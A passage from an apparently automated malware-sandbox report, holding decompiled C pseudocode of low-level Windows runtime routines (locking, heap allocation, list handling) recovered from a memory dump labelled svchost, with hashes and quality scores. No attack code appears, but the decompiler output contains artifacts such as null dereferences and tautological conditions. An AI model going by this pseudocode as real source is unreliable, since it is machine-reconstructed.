                        				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                        				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                        				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                        					_t57 = _t57 | 0x00000001;
                        				}
                        				_t88 = 0;
                        				_t36 = 0;
                        				_t96 = _a12;
                        				if(_a12 == 0) {
                        					_t62 = _a8;
                        					__eflags = _t62;
                        					if(__eflags == 0) {
                        						goto L12;
                        					}
                        					_t52 = E030EC38B(_t85, _t73, _t57, 0);
                        					_t62 = _a8;
                        					 *_t62 = _t52;
                        					_t36 = 0;
                        					goto L11;
                        				} else {
                        					_t36 = E030EACFD(_t85, _t73, _t96, _t57, _a8);
                        					if(0 == 0 || 0 == 0xffffffff) {
                        						_t72 = _t88;
                        					} else {
                        						_t72 =  *0x00000000 & 0x0000ffff;
                        					}
                        					 *_a12 = _t72;
                        					_t62 = _a8;
                        					L11:
                        					_t73 = _v8;
                        					L12:
                        					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                        						L19:
                        						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                        							L22:
                        							_t74 = _v8;
                        							__eflags = _v8;
                        							if(__eflags != 0) {
                        								L25:
                        								__eflags = _t88 - 2;
                        								if(_t88 != 2) {
                        									__eflags = _t85 + 0x44 + (_t88 << 6);
                        									_t88 = E030EFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                        									goto L34;
                        								}
                        								L26:
                        								_t59 = _v8;
                        								E030EEA55(_t85, _v8, _t57);
                        								asm("sbb esi, esi");
                        								_t88 =  ~_t88;
                        								_t41 = E03047D50();
                        								__eflags = _t41;
                        								if(_t41 == 0) {
                        									_t42 = 0x7ffe0380;
                        								} else {
                        									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        								}
                        								__eflags =  *_t42;
                        								if( *_t42 != 0) {
                        									_t43 =  *[fs:0x30];
                        									__eflags =  *(_t43 + 0x240) & 0x00000001;
                        									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                        										__eflags = _t88;
                        										if(_t88 != 0) {
                        											E030E1608(_t85, _t59, 3);
                        										}
                        									}
                        								}
                        								goto L34;
                        							}
                        							_push(_t62);
                        							_t47 = E030F1536(0x3118ae4, (_t74 -  *0x3118b04 >> 0x14) + (_t74 -  *0x3118b04 >> 0x14), _t88, __eflags);
                        							__eflags = _t47;
                        							if(_t47 == 0) {
                        								goto L26;
                        							}
                        							_t74 = _v12;
                        							_t27 = _t47 - 1; // -1
                        							_t88 = _t27;
                        							goto L25;
                        						}
                        						_t62 = _t85;
                        						if(L030EC323(_t62, _v8, _t57) != 0xffffffff) {
                        							goto L22;
                        						}
                        						_push(_t62);
                        						_push(_t88);
                        						E030EA80D(_t85, 9, _v8, _t88);
                        						goto L34;
                        					} else {
                        						_t101 = _t36;
                        						if(_t36 != 0) {
                        							L16:
                        							if(_t36 == 0xffffffff) {
                        								goto L19;
                        							}
                        							_t62 =  *((intOrPtr*)(_t36 + 2));
                        							if((_t62 & 0x0000000f) == 0) {
                        								goto L19;
                        							}
                        							_t62 = _t62 & 0xf;
                        							if(E030CCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                        								L34:
                        								return _t88;
                        							}
                        							goto L19;
                        						}
                        						_t62 = _t85;
                        						_t36 = E030EACFD(_t62, _t73, _t101, _t57, _t62);
                        						if(_t36 == 0) {
                        							goto L19;
                        						}
                        						goto L16;
                        					}
                        				}
                        			}


                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94908716882e2ec81f00da3df1ae6c1912965186e4df8a9dbfc9835898105622
                        • Instruction ID: bd53df244fa9741acb4f71e494c73646042c5214cdb409b44e8d57c8403b7f96
                        • Opcode Fuzzy Hash: 94908716882e2ec81f00da3df1ae6c1912965186e4df8a9dbfc9835898105622
                        • Instruction Fuzzy Hash: A541B5B17067119FD72ADB69C894B7BF7DAAFC8620F084619F8168B390DB34D841C691
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E0304DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                        				char _v5;
                        				signed int _v12;
                        				signed int* _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				intOrPtr _v44;
                        				void* __ebx;
                        				void* __edi;
                        				signed int _t54;
                        				char* _t58;
                        				signed int _t66;
                        				intOrPtr _t67;
                        				intOrPtr _t68;
                        				intOrPtr _t72;
                        				intOrPtr _t73;
                        				signed int* _t75;
                        				intOrPtr _t79;
                        				intOrPtr _t80;
                        				char _t82;
                        				signed int _t83;
                        				signed int _t84;
                        				signed int _t88;
                        				signed int _t89;
                        				intOrPtr _t90;
                        				intOrPtr _t92;
                        				signed int _t97;
                        				intOrPtr _t98;
                        				intOrPtr* _t99;
                        				signed int* _t101;
                        				signed int* _t102;
                        				intOrPtr* _t103;
                        				intOrPtr _t105;
                        				signed int _t106;
                        				void* _t118;
                        
                        				_t92 = __edx;
                        				_t75 = _a4;
                        				_t98 = __ecx;
                        				_v44 = __edx;
                        				_t106 = _t75[1];
                        				_v40 = __ecx;
                        				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                        					_t82 = 0;
                        				} else {
                        					_t82 = 1;
                        				}
                        				_v5 = _t82;
                        				_t6 = _t98 + 0xc8; // 0xc9
                        				_t101 = _t6;
                        				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                        				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                        				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                        				if(_t82 != 0) {
                        					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                        					_t83 =  *_t75;
                        					_t54 = _t75[1];
                        					 *_t101 = _t83;
                        					_t84 = _t83 | _t54;
                        					_t101[1] = _t54;
                        					if(_t84 == 0) {
                        						_t101[1] = _t101[1] & _t84;
                        						 *_t101 = 1;
                        					}
                        					goto L19;
                        				} else {
                        					if(_t101 == 0) {
                        						E0302CC50(E03024510(0xc000000d));
                        						_t88 =  *_t101;
                        						_t97 = _t101[1];
                        						L15:
                        						_v12 = _t88;
                        						_t66 = _t88 -  *_t75;
                        						_t89 = _t97;
                        						asm("sbb ecx, [ebx+0x4]");
                        						_t118 = _t89 - _t97;
                        						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                        							_t66 = _t66 | 0xffffffff;
                        							_t89 = 0x7fffffff;
                        						}
                        						 *_t101 = _t66;
                        						_t101[1] = _t89;
                        						L19:
                        						if(E03047D50() != 0) {
                        							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t58 = 0x7ffe0386;
                        						}
                        						_t102 = _v16;
                        						if( *_t58 != 0) {
                        							_t58 = E030F8ED6(_t102, _t98);
                        						}
                        						_t76 = _v44;
                        						E03042280(_t58, _v44);
                        						E0304DD82(_v44, _t102, _t98);
                        						E0304B944(_t102, _v5);
                        						return E0303FFB0(_t76, _t98, _t76);
                        					}
                        					_t99 = 0x7ffe03b0;
                        					do {
                        						_t103 = 0x7ffe0010;
                        						do {
                        							_t67 =  *0x3118628; // 0x0
                        							_v28 = _t67;
                        							_t68 =  *0x311862c; // 0x0
                        							_v32 = _t68;
                        							_v24 =  *((intOrPtr*)(_t99 + 4));
                        							_v20 =  *_t99;
                        							while(1) {
                        								_t97 =  *0x7ffe000c;
                        								_t90 =  *0x7FFE0008;
                        								if(_t97 ==  *_t103) {
                        									goto L10;
                        								}
                        								asm("pause");
                        							}
                        							L10:
                        							_t79 = _v24;
                        							_t99 = 0x7ffe03b0;
                        							_v12 =  *0x7ffe03b0;
                        							_t72 =  *0x7FFE03B4;
                        							_t103 = 0x7ffe0010;
                        							_v36 = _t72;
                        						} while (_v20 != _v12 || _t79 != _t72);
                        						_t73 =  *0x3118628; // 0x0
                        						_t105 = _v28;
                        						_t80 =  *0x311862c; // 0x0
                        					} while (_t105 != _t73 || _v32 != _t80);
                        					_t98 = _v40;
                        					asm("sbb edx, [ebp-0x20]");
                        					_t88 = _t90 - _v12 - _t105;
                        					_t75 = _a4;
                        					asm("sbb edx, eax");
                        					_t31 = _t98 + 0xc8; // 0x30efb53
                        					_t101 = _t31;
                        					 *_t101 = _t88;
                        					_t101[1] = _t97;
                        					goto L15;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 549092b8c6da42ba8ba6d943d4935a63f7d7b72aea267150110a53dac5af9001
                        • Instruction ID: 8163cc363a8a6a251e5d8eb06269c20da8ced2b6db658324b577f60169f51b65
                        • Opcode Fuzzy Hash: 549092b8c6da42ba8ba6d943d4935a63f7d7b72aea267150110a53dac5af9001
                        • Instruction Fuzzy Hash: 2651B2B5A02216DFCB14DF68C490A9EFBF5BF88310F2485AAD555AB345DB30AE44CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E0303EF40(intOrPtr __ecx) {
                        				char _v5;
                        				char _v6;
                        				char _v7;
                        				char _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t58;
                        				char _t59;
                        				signed char _t69;
                        				void* _t73;
                        				signed int _t74;
                        				char _t79;
                        				signed char _t81;
                        				signed int _t85;
                        				signed int _t87;
                        				intOrPtr _t90;
                        				signed char* _t91;
                        				void* _t92;
                        				signed int _t94;
                        				void* _t96;
                        
                        				_t90 = __ecx;
                        				_v16 = __ecx;
                        				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                        					_t58 =  *((intOrPtr*)(__ecx));
                        					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                        						E03029080(_t73, __ecx, __ecx, _t92);
                        					}
                        				}
                        				_t74 = 0;
                        				_t96 =  *0x7ffe036a - 1;
                        				_v12 = 0;
                        				_v7 = 0;
                        				if(_t96 > 0) {
                        					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                        					_v12 = _t74;
                        					_v7 = _t96 != 0;
                        				}
                        				_t79 = 0;
                        				_v8 = 0;
                        				_v5 = 0;
                        				while(1) {
                        					L4:
                        					_t59 = 1;
                        					L5:
                        					while(1) {
                        						if(_t59 == 0) {
                        							L12:
                        							_t21 = _t90 + 4; // 0x7738c21e
                        							_t87 =  *_t21;
                        							_v6 = 0;
                        							if(_t79 != 0) {
                        								if((_t87 & 0x00000002) != 0) {
                        									goto L19;
                        								}
                        								if((_t87 & 0x00000001) != 0) {
                        									_v6 = 1;
                        									_t74 = _t87 ^ 0x00000003;
                        								} else {
                        									_t51 = _t87 - 2; // -2
                        									_t74 = _t51;
                        								}
                        								goto L15;
                        							} else {
                        								if((_t87 & 0x00000001) != 0) {
                        									_v6 = 1;
                        									_t74 = _t87 ^ 0x00000001;
                        								} else {
                        									_t26 = _t87 - 4; // -4
                        									_t74 = _t26;
                        									if((_t74 & 0x00000002) == 0) {
                        										_t74 = _t74 - 2;
                        									}
                        								}
                        								L15:
                        								if(_t74 == _t87) {
                        									L19:
                        									E03022D8A(_t74, _t90, _t87, _t90);
                        									_t74 = _v12;
                        									_v8 = 1;
                        									if(_v7 != 0 && _t74 > 0x64) {
                        										_t74 = _t74 - 1;
                        										_v12 = _t74;
                        									}
                        									_t79 = _v5;
                        									goto L4;
                        								}
                        								asm("lock cmpxchg [esi], ecx");
                        								if(_t87 != _t87) {
                        									_t74 = _v12;
                        									_t59 = 0;
                        									_t79 = _v5;
                        									continue;
                        								}
                        								if(_v6 != 0) {
                        									_t74 = _v12;
                        									L25:
                        									if(_v7 != 0) {
                        										if(_t74 < 0x7d0) {
                        											if(_v8 == 0) {
                        												_t74 = _t74 + 1;
                        											}
                        										}
                        										_t38 = _t90 + 0x14; // 0x0
                        										_t39 = _t90 + 0x14; // 0x0
                        										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                        										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                        											_t85 = _t85 & 0xff000000;
                        										}
                        										 *(_t90 + 0x14) = _t85;
                        									}
                        									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                        									 *((intOrPtr*)(_t90 + 8)) = 1;
                        									return 0;
                        								}
                        								_v5 = 1;
                        								_t87 = _t74;
                        								goto L19;
                        							}
                        						}
                        						_t94 = _t74;
                        						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                        						if(_t74 == 0) {
                        							goto L12;
                        						} else {
                        							_t91 = _t90 + 4;
                        							goto L8;
                        							L9:
                        							while((_t81 & 0x00000001) != 0) {
                        								_t69 = _t81;
                        								asm("lock cmpxchg [edi], edx");
                        								if(_t69 != _t81) {
                        									_t81 = _t69;
                        									continue;
                        								}
                        								_t90 = _v16;
                        								goto L25;
                        							}
                        							asm("pause");
                        							_t94 = _t94 - 1;
                        							if(_t94 != 0) {
                        								L8:
                        								_t81 =  *_t91;
                        								goto L9;
                        							} else {
                        								_t90 = _v16;
                        								_t79 = _v5;
                        								goto L12;
                        							}
                        						}
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction ID: ed291e0e7c41d09bacf62d7a4c8c015f3c8d51b4ce1d4391ddb27bbccdf50be2
                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction Fuzzy Hash: A5510231E0624AEFDB60CB68C0D07EEFBF9AF46314F1C82A8D44597281C3B5A989C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 84%
                        			E030F740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                        				signed short* _v8;
                        				intOrPtr _v12;
                        				intOrPtr _t55;
                        				void* _t56;
                        				intOrPtr* _t66;
                        				intOrPtr* _t69;
                        				void* _t74;
                        				intOrPtr* _t78;
                        				intOrPtr* _t81;
                        				intOrPtr* _t82;
                        				intOrPtr _t83;
                        				signed short* _t84;
                        				intOrPtr _t85;
                        				signed int _t87;
                        				intOrPtr* _t90;
                        				intOrPtr* _t93;
                        				intOrPtr* _t94;
                        				void* _t98;
                        
                        				_t84 = __edx;
                        				_t80 = __ecx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t55 = __ecx;
                        				_v8 = __edx;
                        				_t87 =  *__edx & 0x0000ffff;
                        				_v12 = __ecx;
                        				_t3 = _t55 + 0x154; // 0x154
                        				_t93 = _t3;
                        				_t78 =  *_t93;
                        				_t4 = _t87 + 2; // 0x2
                        				_t56 = _t4;
                        				while(_t78 != _t93) {
                        					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                        						L4:
                        						_t78 =  *_t78;
                        						continue;
                        					} else {
                        						_t7 = _t78 + 0x18; // 0x18
                        						if(E0307D4F0(_t7, _t84[2], _t87) == _t87) {
                        							_t40 = _t78 + 0xc; // 0xc
                        							_t94 = _t40;
                        							_t90 =  *_t94;
                        							while(_t90 != _t94) {
                        								_t41 = _t90 + 8; // 0x8
                        								_t74 = E0306F380(_a4, _t41, 0x10);
                        								_t98 = _t98 + 0xc;
                        								if(_t74 != 0) {
                        									_t90 =  *_t90;
                        									continue;
                        								}
                        								goto L12;
                        							}
                        							_t82 = L03044620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                        							if(_t82 != 0) {
                        								_t46 = _t78 + 0xc; // 0xc
                        								_t69 = _t46;
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								_t85 =  *_t69;
                        								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        									L20:
                        									_t82 = 3;
                        									asm("int 0x29");
                        								}
                        								 *((intOrPtr*)(_t82 + 4)) = _t69;
                        								 *_t82 = _t85;
                        								 *((intOrPtr*)(_t85 + 4)) = _t82;
                        								 *_t69 = _t82;
                        								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                        								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                        								goto L11;
                        							} else {
                        								L18:
                        								_push(0xe);
                        								_pop(0);
                        							}
                        						} else {
                        							_t84 = _v8;
                        							_t9 = _t87 + 2; // 0x2
                        							_t56 = _t9;
                        							goto L4;
                        						}
                        					}
                        					L12:
                        					return 0;
                        				}
                        				_t10 = _t87 + 0x1a; // 0x1a
                        				_t78 = L03044620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                        				if(_t78 == 0) {
                        					goto L18;
                        				} else {
                        					_t12 = _t87 + 2; // 0x2
                        					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                        					_t16 = _t78 + 0x18; // 0x18
                        					E0306F3E0(_t16, _v8[2], _t87);
                        					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                        					_t19 = _t78 + 0xc; // 0xc
                        					_t66 = _t19;
                        					 *((intOrPtr*)(_t66 + 4)) = _t66;
                        					 *_t66 = _t66;
                        					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                        					_t81 = L03044620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                        					if(_t81 == 0) {
                        						goto L18;
                        					} else {
                        						_t26 = _t78 + 0xc; // 0xc
                        						_t69 = _t26;
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						_t85 =  *_t69;
                        						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        							goto L20;
                        						} else {
                        							 *((intOrPtr*)(_t81 + 4)) = _t69;
                        							 *_t81 = _t85;
                        							 *((intOrPtr*)(_t85 + 4)) = _t81;
                        							 *_t69 = _t81;
                        							_t83 = _v12;
                        							 *(_t78 + 8) = 1;
                        							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                        							_t34 = _t83 + 0x154; // 0x1ba
                        							_t69 = _t34;
                        							_t85 =  *_t69;
                        							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        								goto L20;
                        							} else {
                        								 *_t78 = _t85;
                        								 *((intOrPtr*)(_t78 + 4)) = _t69;
                        								 *((intOrPtr*)(_t85 + 4)) = _t78;
                        								 *_t69 = _t78;
                        								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                        							}
                        						}
                        						goto L11;
                        					}
                        				}
                        				goto L12;
                        			}






















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction ID: 21bca3fbe37a9082ca2dcf7dce8a75022351ac655256c2c6a94e7264b883fea7
                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction Fuzzy Hash: 21519D71601606EFCB15CF14C880AA6FBF5FF45B44F1880AAE9089F612E3B1E945CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 97%
                        			E03052990() {
                        				signed int* _t62;
                        				signed int _t64;
                        				intOrPtr _t66;
                        				signed short* _t69;
                        				intOrPtr _t76;
                        				signed short* _t79;
                        				void* _t81;
                        				signed int _t82;
                        				signed short* _t83;
                        				signed int _t87;
                        				intOrPtr _t91;
                        				void* _t98;
                        				signed int _t99;
                        				void* _t101;
                        				signed int* _t102;
                        				void* _t103;
                        				void* _t104;
                        				void* _t107;
                        
                        				_push(0x20);
                        				_push(0x30fff00);
                        				E0307D08C(_t81, _t98, _t101);
                        				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                        				_t99 = 0;
                        				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                        				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                        				if(_t82 == 0) {
                        					_t62 = 0xc0000100;
                        				} else {
                        					 *((intOrPtr*)(_t103 - 4)) = 0;
                        					_t102 = 0xc0000100;
                        					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                        					_t64 = 4;
                        					while(1) {
                        						 *(_t103 - 0x24) = _t64;
                        						if(_t64 == 0) {
                        							break;
                        						}
                        						_t87 = _t64 * 0xc;
                        						 *(_t103 - 0x2c) = _t87;
                        						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3001664));
                        						if(_t107 <= 0) {
                        							if(_t107 == 0) {
                        								_t79 = E0306E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3001668)), _t82);
                        								_t104 = _t104 + 0xc;
                        								__eflags = _t79;
                        								if(__eflags == 0) {
                        									_t102 = E030A51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x300166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                        									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                        									break;
                        								} else {
                        									_t64 =  *(_t103 - 0x24);
                        									goto L5;
                        								}
                        								goto L13;
                        							} else {
                        								L5:
                        								_t64 = _t64 - 1;
                        								continue;
                        							}
                        						}
                        						break;
                        					}
                        					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        					__eflags = _t102;
                        					if(_t102 < 0) {
                        						__eflags = _t102 - 0xc0000100;
                        						if(_t102 == 0xc0000100) {
                        							_t83 =  *((intOrPtr*)(_t103 + 8));
                        							__eflags = _t83;
                        							if(_t83 != 0) {
                        								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                        								__eflags =  *_t83 - _t99;
                        								if( *_t83 == _t99) {
                        									_t102 = 0xc0000100;
                        									goto L19;
                        								} else {
                        									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                        									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                        									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                        									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                        										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                        										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                        											L26:
                        											_t102 = E03052AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                        											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        											__eflags = _t102 - 0xc0000100;
                        											if(_t102 != 0xc0000100) {
                        												goto L12;
                        											} else {
                        												_t99 = 1;
                        												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                        												goto L18;
                        											}
                        										} else {
                        											_t69 = E03036600( *((intOrPtr*)(_t91 + 0x1c)));
                        											__eflags = _t69;
                        											if(_t69 != 0) {
                        												goto L26;
                        											} else {
                        												_t83 =  *((intOrPtr*)(_t103 + 8));
                        												goto L18;
                        											}
                        										}
                        									} else {
                        										L18:
                        										_t102 = E03052C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                        										L19:
                        										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        										goto L12;
                        									}
                        								}
                        								L28:
                        							} else {
                        								E0303EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        								 *((intOrPtr*)(_t103 - 4)) = 1;
                        								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                        								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                        								_t76 = E03052AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                        								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                        								__eflags = _t76 - 0xc0000100;
                        								if(_t76 == 0xc0000100) {
                        									 *((intOrPtr*)(_t103 - 0x1c)) = E03052C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                        								}
                        								 *((intOrPtr*)(_t103 - 4)) = _t99;
                        								E03052ACB();
                        							}
                        						}
                        					}
                        					L12:
                        					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                        					_t62 = _t102;
                        				}
                        				L13:
                        				return E0307D0D1(_t62);
                        				goto L28;
                        			}






















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dcfbb14a157c908fe71797c883af31c73a171d5d4b9910e78a40726d32b33b62
                        • Instruction ID: e5630ec100cbbd967c388448bb7263fd0578645cd0e282f1fb7da896daf0d4d4
                        • Opcode Fuzzy Hash: dcfbb14a157c908fe71797c883af31c73a171d5d4b9910e78a40726d32b33b62
                        • Instruction Fuzzy Hash: A5514675A02209DFDF25DF55C880ADFBBB9BF48310F198855FC15AB220C3359952CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E03054BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                        				signed int _v8;
                        				short _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				char _v36;
                        				char _v156;
                        				short _v158;
                        				intOrPtr _v160;
                        				char _v164;
                        				intOrPtr _v168;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t45;
                        				intOrPtr _t74;
                        				signed char _t77;
                        				intOrPtr _t84;
                        				char* _t85;
                        				void* _t86;
                        				intOrPtr _t87;
                        				signed short _t88;
                        				signed int _t89;
                        
                        				_t83 = __edx;
                        				_v8 =  *0x311d360 ^ _t89;
                        				_t45 = _a8 & 0x0000ffff;
                        				_v158 = __edx;
                        				_v168 = __ecx;
                        				if(_t45 == 0) {
                        					L22:
                        					_t86 = 6;
                        					L12:
                        					E0302CC50(_t86);
                        					L11:
                        					return E0306B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                        				}
                        				_t77 = _a4;
                        				if((_t77 & 0x00000001) != 0) {
                        					goto L22;
                        				}
                        				_t8 = _t77 + 0x34; // 0xdce0ba00
                        				if(_t45 !=  *_t8) {
                        					goto L22;
                        				}
                        				_t9 = _t77 + 0x24; // 0x3118504
                        				E03042280(_t9, _t9);
                        				_t87 = 0x78;
                        				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                        				E0306FA60( &_v156, 0, _t87);
                        				_t13 = _t77 + 0x30; // 0x3db8
                        				_t85 =  &_v156;
                        				_v36 =  *_t13;
                        				_v28 = _v168;
                        				_v32 = 0;
                        				_v24 = 0;
                        				_v20 = _v158;
                        				_v160 = 0;
                        				while(1) {
                        					_push( &_v164);
                        					_push(_t87);
                        					_push(_t85);
